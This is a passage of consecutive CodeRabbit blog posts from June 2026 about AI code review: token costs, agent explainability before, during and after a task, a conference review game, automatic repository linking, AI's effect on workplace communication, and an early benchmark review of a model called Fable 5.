month on tokens alone for small teams, and that the approach does not scale. Token cost is only part of the problem. Model routing, context distillation, benchmarking, and keeping up with every new model release require expertise and infrastructure most teams do not have the knowledge and time to build. CodeRabbit absorbs that complexity and turns it into business value for customers. ### A little optimization goes a long way In an internal experiment by our VP of AI, David Loker, he built a simple review system with no domain intelligence or context engineering. It churned through roughly 200,000 tokens to find a single bug. With a small amount of domain-informed optimization, the updated version found the same bug with about 18,000 tokens total: roughly 17,000 tokens for the diff itself, plus only about 1,000 additional tokens of targeted context. That is a 91% reduction in total tokens\! ### CodeRabbit delivers the best ROI in AI code review And that was one simple optimization loop. As a pioneer in AI code review, CodeRabbit has spent the past three years refining the engineering and technology behind context discipline, smart LLM routing, and prompt caching for AI review. That accumulated optimization is passed directly to customers. We know, and continue to refine, which context matters, which signals add noise, and which review patterns actually catch bugs. That is how CodeRabbit delivers the best ROI for code review. Teams get high performance, predictable seat-based pricing, and flexible usage-based add-ons for high-throughput agentic loops, so they can ship high-quality code with confidence. ## Maximize merges, not tokens The point of AI code review is not to consume more tokens, but to help teams ship better code faster, with fewer production issues and less review bottleneck. That is what CodeRabbit delivers, high-quality reviews on every PR. Developers get continuous feedback without wondering whether another review is worth the bill, and engineering leaders get the confidence that review quality is scaling with the team, not being rationed by token spend. Mergemaxxing is the better metric, and every PR is reviewed, real issues caught early, developers free to iterate, and code shipped with confidence. Out with token maximization. In with merge maximization. Ready to ship high-quality code with confidence? Start a [14-day free trial](https://app.coderabbit.ai/login???free-trial) or [talk to our sales team](https://www.coderabbit.ai/contact-us/sales) to see what best-in-class review performance looks like on your repos at a cost you can predict.

Before, during, after: The three moments AI Agents earn your trust

Priyanka Kukreja — Mon, 15 Jun 2026 00:00:00 GMT

We’ve moved past the era of questioning AI *capability*. Now, the bottleneck is *trust*. In [our last post](https://www.coderabbit.ai/blog/do-you-trust-your-ai-agent) on the topic of Explainability, we drew a sharp line between observability and explainability: what the agent did vs. why it did it. We established that humans need explainability for three distinct jobs: verification, debugging, and auditability. But where do these explanations actually belong in a developer's day-to-day workflow? If you wait until the agent is completely done to show a summary, you’ve already lost the user. To serve those three critical jobs, explainability must be woven directly into the product workflow. Let’s look at exactly where those moments live. ## Three futures, one common thread To understand why workflow placement matters, look at where the entire AI industry is heading. Anthropic recently published [an analysis of AI development scenarios](https://www.anthropic.com/institute/recursive-self-improvement), laying out three distinct paths: ![Diagram comparing three phases of human-AI workflow: Stall, Compounding, and Recursive Self-Improvement.](https://victorious-bubble-f69a016683.media.strapiapp.com/3_distinct_paths_21a147115a.png) * In the first scenario: Progress stalls, but today's already-powerful models diffuse across the economy. * In the second scenario: AI labs keep compounding efficiency gains, with humans still setting direction and judging results. * In the third scenario: AI systems begin recursively improving themselves, and humans move "most of our effort towards oversight, validation, and verification." Notice what happens to the human role in the (more likely) second and third scenarios. Humans stop being the ones doing the work and instead start verifying it. Anthropic says this is already happening inside their own walls, as more than 80% of the code merged into their codebase is now written by Claude. And as code generation accelerated, human review became the bottleneck. They invoke [Amdahl's law](https://lawsofsoftwareengineering.com/laws/amdahls-law/) — speed up one part of a process, and the overall pace gets capped by the parts that didn't speed up. That's the thread connecting all three futures. Whichever one we land in, the scarce human activity isn't writing the code, but rather deciding whether to trust it. ## The limits of trusting outcomes For the past year, the industry’s central question regarding AI agents was purely about *capability*. We asked: Can the agent do X? {X: Fix the bug | Refactor the service | Run the experiment | etc}. We now have our answer from both industry benchmarks and real-world usage data. Consider the sheer velocity of agentic output: * **Commit Volatility:** GitHub processed roughly a billion commits in all of 2025; by mid-2026, it was tracking 275 million commits a week ([reference](https://quasa.io/media/github-s-ai-agent-tsunami-275-million-commits-a-week-14-billion-projected-for-2026-and-the-platform-is-starting-to-crack)) —putting the industry on pace for 14 billion commits this year. Agents are now committing code at machine speed. * **Network Traffic:** Cloudflare reported that weekly requests generated by autonomous AI agents more than doubled across its network in a single month ([reference](https://markets.financialcontent.com/stocks/article/marketminute-2026-2-18-the-agentic-internet-arrives-cloudflare-surges-13-on-record-revenue-and-ai-pivot)). * **Task Horizon:** METR’s measurements show that the length of time an agent can reliably operate is doubling roughly every four months. Agents that maxed out at four-minute tasks two years ago can now run for twelve hours unattended ([reference](https://metr.org/blog/2026-1-29-time-horizon-1-1/)). What drives these sticky adoption curves is a foundational trust in outcomes. Developers have watched agents close enough tickets, fix enough flaky tests, and ship enough working PRs that capability is not even a question anymore. But "trusting the outcome" has an expiration date. As agents take on longer tasks with a vastly larger blast radius, the sheer volume of edge cases that fall outside the "agent is usually right" window starts to compound. If your product is hitting this stage, first: congratulations. But second: good luck. You have reached a volume of agentic output that makes line-by-line human review mathematically impossible. That is the ultimate squeeze. You have more code output than you can humanly manage to verify, yet the stakes of a failure have never been higher. The only way to navigate this AI-first world is to build AI tooling that makes explainability cheap. Which is to say: **every AI tool is on an inevitable path to becoming an explainability tool.** ![Multiple people, labeled 'AI TOOL', aim guns in a room, appearing to be a meme.](https://victorious-bubble-f69a016683.media.strapiapp.com/image1_20e15014f8.png) Yes, there's an obvious punchline here: who explains the explainer? An AI tool explaining an AI tool that's explaining another AI tool, all the way down the pews. But the recursion bottoms out in the same place it always has — a human. The point of the explainability stack in our first [post on explainability](https://www.coderabbit.ai/blog/do-you-trust-your-ai-agent) wasn’t to add infinite layers of watchers; it's to make sure that wherever a human sits in that chain, the "why" reaching them is actionable. The weights are commoditizing across foundational models, so the products that win the next phase won't be the ones with marginally better models. They'll be the ones that make the human at the end of the chain fast, accurate, and a little less *miserable ;-)* ## Explainability workflow Most teams treat explainability as a post-hoc artifact: the agent finishes, then produces a summary. That's only one-third of the job. True explainability happens at three distinct moments, and each one needs a different kind of "why." ### 1\. Before the work: show me your thinking ![Brain icon with a circular loading indicator and text 'Before the work, Explaining the thinking'.](https://victorious-bubble-f69a016683.media.strapiapp.com/thinking_7f36bb75b5.png) The cheapest place to catch a bad decision is before any work happens. Before an agent touches a single file, it should be able to answer: here's what I understood you to be asking for, here's how I'm breaking it into steps, and here's why this approach over the alternatives. This is the reasoning and planning layer, and it's where intent mismatches surface. Say you ask an agent to "fix the flaky checkout test." One valid plan is to find and fix the race condition causing the flake. Another is to add a retry wrapper. A third is to delete the test entirely. While all three technically "fix” the problem, your intent was only one of them. A plan surfaces these misalignments early on, helping redirect your agent before it burns through your tokens and/or hours of your afternoon trying to debug the aftermath. >*The question your product must answer at this stage:* *Does the agent understand my intent, and does the decomposition of the task align with that intent?* ### 2\. During the work: show me your explorations ![Orange dotted lines connect squares on a dark background, illustrating a work process with text.](https://victorious-bubble-f69a016683.media.strapiapp.com/explorations_8413370bca.png) Agents don't walk a straight line from a prompt to a PR. They branch, hit dead ends, backtrack, and recalibrate. That exploration is invisible in the final diff, but non-negotiable for the user to build trust. What you want here isn't a raw tool log. Our original [post](https://www.coderabbit.ai/blog/do-you-trust-your-ai-agent) on explainability covered why "show logs" fails everyone. You want the decision trace: which paths the agent explored, which ones turned out to be no-ops, and crucially, what specific piece of information it saw before committing to a branch. For example, "Explored the caching approach, found that the cache layer is bypassed for authenticated requests, and switched to fixing the query instead" lets a reviewer verify a judgment call in five seconds. If that same information were scattered across 400 lines of raw tool calls, it would be effectively hidden for all intents and purposes even though your AI product “handles explainability”. >*The question your product must answer at this stage:* *Is the agent following the correct chain of thought? Did it pick the right paths, feed them valid inputs, and correctly interpret what came back before moving on?* ### 3\. After the work: show me the impact ![A network graph shows a central node connecting to several highlighted orange nodes and paths.](https://victorious-bubble-f69a016683.media.strapiapp.com/blast_radius_24878be302.png) This part of your workflow has the highest stakes, even though it is the most frequently missed. An agent hasn't explained its work until it has explained the *all-encompassing consequences* of that work, including and especially the ones that aren't visible in the diff right in front of you. A summary of code changes is just a PR description. Only a thorough showcase of the full range of impact is a real explanation. A common product mistake is building the former but believing it is the latter. Consider an example. An agent opens a PR with a one-line change: it renames an enum value from `cancelled` to `canceled` to fix an inconsistent spelling across the codebase. The diff is clean. The type checker is happy. Every test in the repo passes, because the agent dutifully updated them too. By every signal available in the PR, this is the safest change imaginable — a simple typo fix. Except that value doesn't just live in this repo. It's serialized into events on a queue, and a billing service two hops downstream string-matches on `cancelled` to stop invoicing a subscription. Nothing errors. Nothing pages. The billing service just quietly stops recognizing cancellations, and customers who canceled keep getting charged. A reviewer who only sees the diff is verifying a spelling fix. A reviewer who is shown the full blast radius — *this value crosses a service boundary, and here is who consumes it* — is verifying the actual decision. This is not a one-off edge case. It's a major gap in how we review code today. Code review has always anchored on what's immediately in front of us, but the consequences of a change rarely respect the boundaries of a diff. This is why we believe explainability at this stage must be held to a high bar: not just "what changed" but a thorough understanding of what the system will do differently because of it. >*The question your product must answer at this stage:* *What does this change actually do — exhaustively, including the parts I cannot see?* ## Explainability is the product Stepping back from the three stages in the workflow and looking at what they have in common. * Before the work, the agent explains its intent. * During the work, it explains its judgment. * After the work, it explains its consequences. ![Timeline illustrating "During the work" and "After the work" with specific explanations.](https://victorious-bubble-f69a016683.media.strapiapp.com/Interior_explaining_7a5bad9757.png) These aren't three features to be checked off a roadmap — they are one single obligation, applied at the three points where a human has to make a decision about the agent's work: whether to let it proceed, or take control and maneuver it in a different direction. That is the real shape of the oversight role the industry is converging on. A human overseeing agents isn't reading every line; they are answering those three questions, over and over, across more output than any person can inspect directly. The quality of their oversight is therefore bounded by the quality of the explanations reaching them. If the industry's own forecasts are right and the human role converges on oversight and validation, then explainability isn't just a nice-to-have layered on top of AI tools. It is the product. At [CodeRabbit](https://coderabbit.ai/), that's the assumption we're building on. Across everything we ship, the design question is the same: what does the human verifying this work need to know, and at which moment do they need to know it?

We watched developers approve bugs in 30 seconds

Konrad Sopala — Fri, 12 Jun 2026 00:00:00 GMT

Recently, we turned code review into a speed competition at CodeRabbit’s app.js conference booth. At app.js, JS Nation, and React Summit, we asked hundreds of developers how they really review code. The answers were a lot less funny than the game. The rules were simple. A code snippet hits the screen, and attendees have thirty seconds to approve or request changes from their phone. Faster correct answers score more, so you're deciding under pressure. Once the votes lock, we reveal the bugs missed and their fixes. ![Group of people networking around a display at an indoor event or conference.](https://victorious-bubble-f69a016683.media.strapiapp.com/image3_bbed7a3731.jpg) Every round, we called out the current leader and the fastest correct answer, so way more people got a "THAT WAS ME" moment than just the three who'd actually take home prizes. ![React stopwatch code next to a poll: 9 'Approve', 12 'Request changes'.](https://victorious-bubble-f69a016683.media.strapiapp.com/image1_6879bd844c.png) Round after round the same thing kept happening: a bug would go up, the clock would run, and a chunk of the room would confidently wave it through. The "obviousness" of a bug turned out to have almost nothing to do with whether people caught it at speed. %[https://x.com/yoimkonrad/status/2060332889175109989?s=46] ## Then we talked to you During those three conferences but also between game rounds we talked with hundreds of developers about how you actually review code. The same themes came up again and again and they're worth recapping, because most of them contradict how teams think review works. ![Audience attending a tech presentation with a speaker on stage and a 'swim' logo.](https://victorious-bubble-f69a016683.media.strapiapp.com/image2_579ab2c378.png) ## It's built right in The single most common setup we heard: whatever review bot came bundled with their code host, because it's already in the PR and it's one less tab to open. We get the logic. It's the office-fridge sandwich of code review. It's right there, and the deli is a whole walk away. But these were often the same developers who told us, in the same conversation, that review is one of their bottlenecks to shipping. If something is genuinely slowing your team down, "it came pre-installed" is a strange bar to set for the tool that's supposed to fix it. We think that bar is worth raising, and that code reviews should read like a teammate left them instead of a linter with a thesaurus, about the parts that bent to fit their repo instead of the other way around. Everything for code review should be built around review quality. ## The agent said it's fine, so it's fine A good chunk of the developers we spoke with review code with the same coding agent that writes the code. Not as a dedicated review step; the tool is already open, it wrote the code, so it gets to check the code too. What worries us is what happens after the agent answers: nothing. It hands down a verdict and the developer takes it. No pushback, no follow-up questions, no seam to pry open. The whole interaction runs in one direction. So judgment gets outsourced to a tool that was built to generate code, not to have a conversation about a pull request, and then even that conversation stops. Review is supposed to be a back-and-forth. Take it as-is and what you're holding is a fortune cookie. ## I could build a better, cheaper version myself Then there's the developer that's going to build it in-house. The model's right there, the API is cheap, how hard can it be? A day here and there and they'll have a reviewer tailored to their stack, at a fraction of what the dedicated tools charge. It is not an easy task. We're not going to relitigate the whole thing here, because we already did, in detail: [your internal AI code review tool costs more than you think.](https://www.coderabbit.ai/blog/your-internal-ai-code-review-tool-cost-more-than-you-think) The short version is that the model call is the cheap part. The expensive part is everything around it: the context engineering, the noise suppression so it doesn't flag every line of the diff, the integrations, the maintenance, the engineer-months now going into a code review tool instead of the product you're actually paid to ship. The "fraction of the cost" math only works if you never assign it a salary. Building your own is the most expensive way to learn that the hard part was never the AI. ## What all developers at the conferences agreed on Strip away the tooling arguments, there was one belief that nobody disagreed with: We ship too much code to review it all by hand. That ship has sailed, and we aren’t going back to that approach. The volume of code generated by agents is up and to the right, and it isn’t declining anytime soon. Developers are now manually writing less code, but reviewing far more than ever before. That is the job now for developers, and it’s a hard job. At times it is a cognitive overload, as the diffs are getting larger, but we are still reviewing code in platforms that were meant for human generated code and not AI generated code. AI code review isn't a nice-to-have your team adopts when it's mature enough. It's the load-bearing wall of how software gets shipped now. That's the category we set out to define, and it's the rare thing everyone at a conference already agrees with before you finish the sentence. ![Four smiling team members stand by the CodeRabbit AI code review booth at an event.](https://victorious-bubble-f69a016683.media.strapiapp.com/image5_aa733f6bcc.png)

Automatic Repository Linking: Cross-repo context without manual setup

Erfan Al-Hossami — Thu, 11 Jun 2026 00:00:00 GMT

A pull request can look safe in one repository and still break another service that depends on it. That is why we shipped [Multi-Repo Analysis](https://www.coderabbit.ai/blog/Coderabbit-multi-repo-analysis): to help CodeRabbit review changes with context from related repositories. The challenge was set up. Teams still had to tell CodeRabbit which repositories were connected, and that list could go stale as services, packages, and ownership changed. [Automatic Repository Linking](http://docs.coderabbit.ai/knowledge-base/automatic-repository-linking) removes that manual step. CodeRabbit can now detect related repositories across your organization and use them as review context, so cross-repo impact is easier to catch before you merge. %[https://youtu.be/cKE6q5JLQ8Y] ## What Automatic Repository Linking does Automatic Repository Linking discovers and links related repositories across your organization. It first analyzes signals that define a dependency such as import graphs, dependency manifests, and shared code patterns. It then links the repositories that depend on each other, so CodeRabbit knows your architecture without anyone maintaining a list. What that gives your team: * **Cross-repo context with zero setup.** Related repositories get linked automatically. You do not need to maintain a static list of related repositories as services and packages evolve. * **Links that reflect how your code fits together.** Because the connections come from the code itself, they map to real technical dependencies and stay current as your services evolve. * **The same reviews, on more of your code.** Auto-discovered links feed directly into CodeRabbit's [research agent](https://www.coderabbit.ai/blog/agentic-code-review-vs-rag-multi-repo-analysis), which explores linked repositories in real time and surfaces breaking changes with exact files and line numbers before you merge. Auto-linked repositories are stored separately from manual links. Manual links are not overwritten. Automatic Repository Linking also builds on CodeRabbit’s knowledge base. If your organization has opted out of knowledge base features, both Multi-Repo Analysis and Automatic Repository Linking is disabled. ## How it works and why our approach is different ![Diagram showing CodeRabbit's automatic repository linking, connecting a service to related repositories.](https://victorious-bubble-f69a016683.media.strapiapp.com/image1_a9cfed04eb.png) Cross-repo context has become a useful feature for coding agents and code reviewers, yet most approaches still depend on a human to draw the map. Some tools widen their view beyond a single repository only when you scope that context by hand, whether by passing extra directories to the agent, opening a multi-root workspace, or declaring related repositories in a configuration or agents file. Others automate the discovery step but infer relationships from team activity, such as which contributors have recently committed where. That can show how people work, yet it does not prove that two repositories are actually related. Distinctly, Automatic Repository Linking starts from code-level evidence. CodeRabbit looks across eligible repositories in your organization for signals such as imports, dependency manifests, API usage patterns, contracts, and repository README files. When those signals point to a real relationship, CodeRabbit links the repository as review context. During review, CodeRabbit combines those auto-detected links with any repositories your team already configured manually. The multi-repo research agent can then inspect the linked repositories and surface downstream impact with concrete files and lines. The Review info section shows which repositories were considered. ## Get started %[https://youtu.be/ckKYd1-e1CI] You should not have to keep a manual map of every service, package, and repository relationship in your organization. With Automatic Repository Linking, CodeRabbit keeps that context closer to the code, so reviews can catch downstream impact before it reaches production. Automatic Repository Linking is available for Pro plus and Enterprise customers. Enable it in your knowledge base settings and start sharing context between your repositories. **Learn more** * [Introducing Multi-Repo Analysis](https://www.coderabbit.ai/blog/Coderabbit-multi-repo-analysis) * [Why agentic code review beats RAG for multi-repository analysis](https://www.coderabbit.ai/blog/agentic-code-review-vs-rag-multi-repo-analysis) * [Multi-Repo Analysis documentation](https://docs.coderabbit.ai/knowledge-base/multi-repo-analysis)

Humans don’t have an API

David Kravets — Wed, 10 Jun 2026 00:00:00 GMT

Are we treating coworkers like AI agents? Take a look at your recent Slack messages, Google Docs comments, emails, or the transcripts of your last few video calls with colleagues. How many of them began with a greeting, or provided context for a sudden request? Now look at your chat history with your preferred AI assistant. One of the more curious features of the modern workplace is that these two columns of text can sometimes look surprisingly similar. As generative AI becomes embedded in daily work, the line between how we communicate with software and how we communicate with one another can feel less distinct than it once did. Direct requests, immediate responses, and highly task-focused exchanges have become a routine part of interacting with AI systems. As organizations optimize for efficiency, it is worth considering how those habits may influence communication in the workplace as well. ## **The side effects of talking to machines** A common response to concerns about AI etiquette is straightforward. The system has no feelings, so how we speak to it doesn't matter. However, behavioral scientists have long understood that habits formed in one context often spill over into others. So, does spending hours each day issuing commands to conversational AI systems change how we communicate when another human being is on the receiving end? The evidence is still emerging. However, new research suggests that prolonged interaction with AI systems may influence interpersonal communication styles in subtle but meaningful ways. Generative AI rewards directness. It responds instantly, stays focused on the requested task (unless there’s hallucinations) and converts instructions into results with remarkable speed. The interaction is efficient, goal-oriented, and largely free of the social rituals that characterize human conversation. Over time, it is reasonable to wonder whether those expectations begin migrating into our human relationships as well. Human relationships are built through repeated interactions that create trust, understanding, and shared context over time. These moments may appear inefficient when measured purely by output, yet they help build the goodwill and mutual confidence that make productive collaboration possible. When we begin treating coworkers like conversational interfaces, like APIs, those relational investments become easier to skip. ## **What some emerging literature says** Because generative AI arrived so quickly, research on its social consequences is still catching up to the reality that millions of people are spending hours each day interacting with machines capable of producing human-like conversation. Nevertheless, research is beginning to examine how those interactions may influence human relationships and workplace behavior. ### **The AI "social forcefield"** Researchers Christoph Riedl, Saiph Savage, and Josie Zvelebilova explored this phenomenon in their paper [*Cognitive Spillover in Human-AI Teams*](https://arxiv.org/abs/2407.17489). The researchers conducted two randomized experiments to examine whether interactions with AI influence subsequent human-to-human communication. Across both experiments, they found evidence of what they call "cognitive spillover," where the effects of AI exposure carried forward into later interactions between people. According to the authors, AI exposure influenced shared language, collective attention, shared mental models, and social cohesion. The researchers describe this phenomenon as an "AI social forcefield." The term reflects the paper's central argument that AI shapes the social and cognitive environment in which collaboration occurs. In the researchers' framing, AI functions as part of the environment that influences how people communicate, coordinate, and develop shared understanding. Their findings suggest that AI influences more than the quality or speed of work. It can also shape how people focus their attention, exchange information, and build common ground with one another. The paper focuses on controlled experiments rather than long-term workplace behavior. Its findings nevertheless raise an important question for organizations rapidly adopting AI. If interactions with AI can influence subsequent human-to-human communication, what happens when those interactions become a daily part of work? ### **A warning flare about human relationships** If the cognitive spillover research offers evidence that AI can influence human communication, another paper raises a broader concern about where those effects might lead. In [*Chatbots and Human-Human Relationships: The Need for Research on Potential Downstream Harms from Generative AI*](https://www.tandfonline.com/doi/full/10.1080/13668803.2026.2623500?), researchers Justin Keeler and Brett Murphy issue what amounts to a warning flare. Their central argument is that society is adopting conversational AI systems far faster than researchers understand their long-term effects on human relationships. Rather than presenting experimental findings, the paper identifies a set of potential downstream harms that the authors believe warrant further study. Among the concerns they discuss are reduced social interaction between people, spillover effects from chatbot interactions into human relationships, and the possible erosion of social abilities. A central theme of the paper is reciprocity. The authors note that conversational systems can provide relational benefits to users without requiring reciprocal efforts in return. Human relationships operate differently. They depend on mutual obligation, compromise, empathy, and ongoing investment from both participants. The researchers argue that this difference raises important questions about how widespread interactions with conversational AI may influence human relationships over time. The paper presents these concerns as hypotheses requiring further investigation rather than established conclusions. Its purpose is to encourage debate, not settle it. The underlying question is difficult to ignore. How might communication habits developed through interactions with conversational AI systems influence the way people relate to one another? ## **The parts of work that don’t scale** Both papers point in the same direction. One provides evidence that interactions with AI can influence subsequent human communication. The other argues that society has only begun to explore the long-term consequences of those influences. If AI changes how people relate to one another, what exactly is at stake? The answer begins with the value of human connection itself. Decades of workplace research have found that employees who feel supported, valued, and connected to the people around them are more engaged in their work. Organizations thrive on more than the exchange of information. Trust, cooperation, mentorship, and shared purpose shape how work gets done. Workplaces can automate tasks. Relationships still have to be earned. ## **Humans don't have an API** AI systems are designed to transform prompts into responses. A prompt arrives, the system processes it, and a response follows. The interaction is immediate, task-oriented, and highly predictable. Human collaboration operates differently. Colleagues bring experience, judgment, competing priorities, emotions, relationships, and context to every interaction. A request often becomes a conversation. Discussions lead to new ideas. Detours can reveal better solutions than the one originally imagined. Beyond exchanging information, the strongest teams develop common ground, challenge assumptions and learn from one another. Many of their best ideas emerge from conversations that wander beyond the immediate task at hand. AI excels at producing answers. Organizations excel when people build understanding together. ## **The human cost of efficiency** Efficiency is one of the great promises of AI. It gives faster responses, decisions, and execution. Organizations naturally embrace tools that help people accomplish more in less time. But speed is only one measure of organizational health. The same systems that reduce friction can also reduce opportunities for discussion, context-sharing, and reflection. Those activities often appear inefficient when measured against a task list, yet they help teams learn, adapt, and make better decisions. Organizations succeed by moving information efficiently. They also succeed by creating alignment, developing people, and building shared understanding. Those outcomes rarely appear on a dashboard, but they shape the quality of decisions, the resilience of teams, and the strength of workplace culture. As AI continues to improve the efficiency of work, organizations will increasingly determine what they value beyond efficiency itself. ## **Rewriting the interface** The next time you draft a Slack message or make a request of a colleague, take a moment to consider the language you're using. Are you having a conversation, or issuing a prompt? Before sending a context-free directive, consider adding back some of the elements that AI interactions remove. Explain why the task matters. Share the broader context. Ask a question instead of issuing a command. Take a moment to acknowledge the person on the other side. None of these actions are efficient in the machine sense, and that is precisely the point. We spent decades worrying about whether artificial intelligence would become too much like humans. But the more immediate risk is humans becoming a little too much like machines.

Fable 5 model review: Early signals from code review and coding tasks

Juan Pablo Flores — Tue, 09 Jun 2026 00:00:00 GMT

**UPDATE:** Access to Fable 5 has been [suspended](https://www.anthropic.com/news/fable-mythos-access) for all users in response to a directive the by the U.S. government. Fable 5 is worth testing for autonomous coding work, especially when the prompt is incomplete and the agent has to discover the environment before it can build. For production code review, the current baseline and Opus 4.8 still look safer. Fable 5 is the kind of model that changes how an agent feels when the task is underspecified. It directs exploration well: first learning the environment, then identifying what files, tools, and constraints are available, then building from that grounded picture. It does not spend much time narrating what it is about to do. If it has enough context, it starts building. We saw that across multiple coding projects we used to test the model's capabilities. We could give Fable 5 vague prompts and still get complete projects rather than prototype shells. It also found solution paths that felt less obvious, including approaches that earlier model reviews struggled to reach without more hand-holding. The same behavior also shows up as a cost. In our coding task benchmark, Fable 5 often kept working until the harness cut it off. That makes the model feel capable, but it also makes it expensive and slower in agent workflows that do not have strong stop rules. So the recommendation is not a clean "switch everything." It is: use Fable 5 where autonomy is the product, keep the current code review path while precision and comment volume are tuned. ### **The decision in one paragraph** Use Fable 5 when the job is to explore, plan, and build, especially when the task can take longer in exchange for a more thorough implementation. Keep the current reviewer in place for now. The code-review signal is close on coverage, but not yet strong enough on precision or volume to become the default. ## **What’s new in Fable 5** Fable 5 is positioned as a Mythos-class model for autonomous knowledge work and coding, which sets a different bar than a routine model upgrade. The promise is not just better answers or a faster Opus 4.8. It is a model built for longer-running agent work: holding more context, making a plan, and carrying the task further before it needs a human to step in. The launch constraints are still important to the capability story. The model includes blocking classifiers for some cybersecurity and biology requests, and the product supports opt-in fallback to Opus 4.8 after classifier blocks. For developers, the practical takeaway is simple: use Fable 5 when the task needs depth, and keep the existing path for workflows that need predictable speed or precision. The public launch price in the release brief is $10 per million input tokens and $50 per million output tokens, with a 10 percent surcharge on regional endpoints. We have seen prices like this before from reasoning models, especially when they introduce a new model category. Those costs may come down over future iterations, but the early picture is clear: developers should evaluate Fable 5 by cost per solved task, not just by token price. ## **Code review: Close on coverage, weaker on precision** In the 105-EP code review benchmark, Fable 5 stayed close to the current baseline on finding coverage. It passed 65 of 105 actionable EPs, just behind the baseline and Opus 4.8 at 66 of 105\. If every comment type is counted, Fable 5 slightly beat the baseline, with 74 of 105 full EP passes versus 72 of 105\. The weaker part is precision. Fable 5 landed at 32.8 percent actionable precision and 19.4 percent full precision, while Opus 4.8 reached 35.5 percent and 26.5 percent. It also produced 253 comments, more than either comparison run, with a large increase in assertive and nitpick-style output. That combination matters for code review because noisy comments create reviewer work even when coverage looks competitive. ![Bar chart shows code review benchmark across three systems and metrics.](https://victorious-bubble-f69a016683.media.strapiapp.com/image1_88991bc8c5.png) The category breakdown makes the result feel more uneven than the headline coverage number suggests. Fable 5 has useful breadth, but the gains are not consistent across the kinds of issues developers expect a reviewer to catch. In practice, teams should expect helpful findings, while still needing manual triage and fallback coverage for categories where review trust is harder to earn. The harder examples make the rollout case more cautious. On difficulty 4 EPs, Fable 5 passed 8 of 16, behind the baseline at 10 of 16 and Opus 4.8 at 9 of 16\. That does not make Fable 5 a poor reviewer, but it does mean developers should expect more human judgment on the cases where review trust is hardest to earn. ![Table comparing Current baseline, Fable 5, and Opus 4.8 software performance metrics.](https://victorious-bubble-f69a016683.media.strapiapp.com/image2_ed54d5af69.png) ## **Security: Helpful, but not automatic trust** Developers are likely to experience Fable 5 as more security-aware than a generic coding model, especially when the task asks for careful implementation around risky behavior. That does not mean it should be treated as a drop-in security reviewer. The practical posture is to use it for deeper security-sensitive coding work, then keep the review bar high before trusting the findings. The strongest security signal came from active implementation. In our coding task benchmark, Fable 5 completed a security-relevant Bandit task when it had a clear objective and enough time to work through the code. Fable 5 looks more useful when security is part of a concrete coding task than when it is asked to catch every issue in review. ## **Coding task benchmark: Capable, but long-running** We stopped the coding task benchmark early after a clear pattern emerged: Fable 5 could make meaningful progress, but many tasks ran long enough to hit the agent timeout. That makes this section an experience signal, not a final leaderboard score. The useful story is how the model behaves on real coding work when the task keeps expanding. ![Bar chart details coding task outcomes: 19 timeouts, 6 passed, 4 failed, 4 cancelled.](https://victorious-bubble-f69a016683.media.strapiapp.com/image3_123ae7e237.png) The outcome mix should be read as a signal about agent behavior, not as a completed benchmark score. The signal cuts both ways. When Fable 5 finished, it produced serious patches rather than shallow edits. When it struggled, it kept exploring longer than the harness could support. For developers, that makes it a better fit for work where depth is worth the wait, provided the agent has clear limits on time, steps, and tokens. The completed tasks also suggest where Fable 5 is most useful. The wins came from implementation work with real structure: types, APIs, publishing behavior, query logic, caching, and security-relevant code. The misses were useful too. Some were quick wrong turns, while others showed the model investing real effort without converging. That is the tradeoff developers should plan for: more depth, but not always a clean finish. ![Bar charts comparing average agent time and output tokens for passed versus failed coding tasks.](https://victorious-bubble-f69a016683.media.strapiapp.com/image4_539ed94f0a.png) Fable 5 spends real time and output budget when it finishes. When it times out, the harness can still burn substantial context. The token profile tells the same story as the timing data. Fable 5 does not just cost more because of list price. It can also spend longer thinking, exploring, and generating before it reaches an answer. Cache discounts may reduce the final bill, and prices may come down over future iterations, but teams should still evaluate the model by cost per solved task. For this kind of agent work, timeout rate, cache behavior, and output token usage matter as much as the published token price. ## **Coding projects show the upside** The coding projects gave the clearest view of Fable 5 at its best. In one project, the model did more than assemble a working surface. It organized the implementation into separate layers for state, decision-making, rendering, and controls, then produced a build that passed. The remaining gaps were the kind you would expect from a first complete version: more robust test coverage, safer state handling, and stricter guards around invalid inputs. Another project showed the same pattern in a more interactive setting. Fable 5 built a working real-time application with a stable loop, procedural visuals, stateful interactions, phase changes, canvas effects, multiple app states, and a successful production build. The issues were not basic completion failures. They were the next layer of engineering work: deterministic tests, small-screen polish, and state edge cases. %[https://youtu.be/HZ_d3MGlHDU] This is the clearest qualitative difference from earlier model reviews. With enough context, Fable 5 moves directly into implementation instead of over-explaining the plan or repeatedly asking for permission. It also seems to spend more effort on architecture, interactions, and product shape than a narrower code-completion model would. ## **Recommendation: Use Fable 5 selectively** The recommendation is selective adoption. Fable 5 is worth testing for autonomous coding work, especially tasks that benefit from deeper planning, multi-file execution, and extra time spent on implementation. I would not make it the default for production code review yet. ### **Where I would use it** * Autonomous coding projects with a clear goal. * Multi-file implementation where depth is worth the wait. * Agent workflows with explicit time, step, and token budgets. ### **Where I would hold back** * Default code review traffic before precision tuning. * Security-review positioning without stronger security-specific evidence. * High-throughput workflows where long runs create cost or latency risk. For code review, keep the current baseline or Opus 4.8 path as the default until Fable 5 improves on precision and comment volume. For coding agents, Fable 5 is more compelling, especially when the work benefits from exploration and deeper implementation. The guardrail is operational: give it clear budgets, stop conditions, and review checkpoints. For security workflows, position it as useful for security-sensitive implementation, not as proof of better security review.

How CodeRabbit Review reads a PR the way its author would explain it

Yiwen Xu — Tue, 09 Jun 2026 00:00:00 GMT

## *DIY can get you a faster review. It can't get you an explainable one.* Coding agents are producing more code than teams can keep up with. [The Salesforce Engineering](https://engineering.salesforce.com/scaling-code-reviews-adapting-to-a-surge-in-ai-generated-code/) team reported code volume up roughly 30%, with pull requests regularly exceeding 1,000 lines and review time on the largest PRs beginning to plateau or even decline. Their diagnosis was direct: Reviewers were no longer meaningfully engaging with the changes. That is not a productivity win. A 500-line PR approved in a few minutes usually means the team is shipping code it does not fully understand. As senior engineers burn out and PRs get rubber-stamped, teams lose confidence in what is actually reaching production. That is the problem [CodeRabbit Review](https://www.coderabbit.ai/blog/introducing-atlas-the-first-ai-native-code-review-interface) was built to fix. In a [previous post](https://www.coderabbit.ai/blog/explainable-reviews-coderabbit-review-context-engine), we covered the context engine and harness that make it possible at a high level. This post goes deeper and examines what the engineering actually looks like, why it is hard to replicate, and why it’s difficult to scale DIY solutions into a verification and quality gate enterprises can trust. ## From flat summaries to logical cohorts Before CodeRabbit Review, CodeRabbit already generated structured summaries and walkthrough comments for every pull request. Reviewers could quickly understand the scope of a PR before diving. That information was useful, but it still left reviewers with work to do. To review the code effectively, they often had to reconstruct the author’s mental model manually. They had to 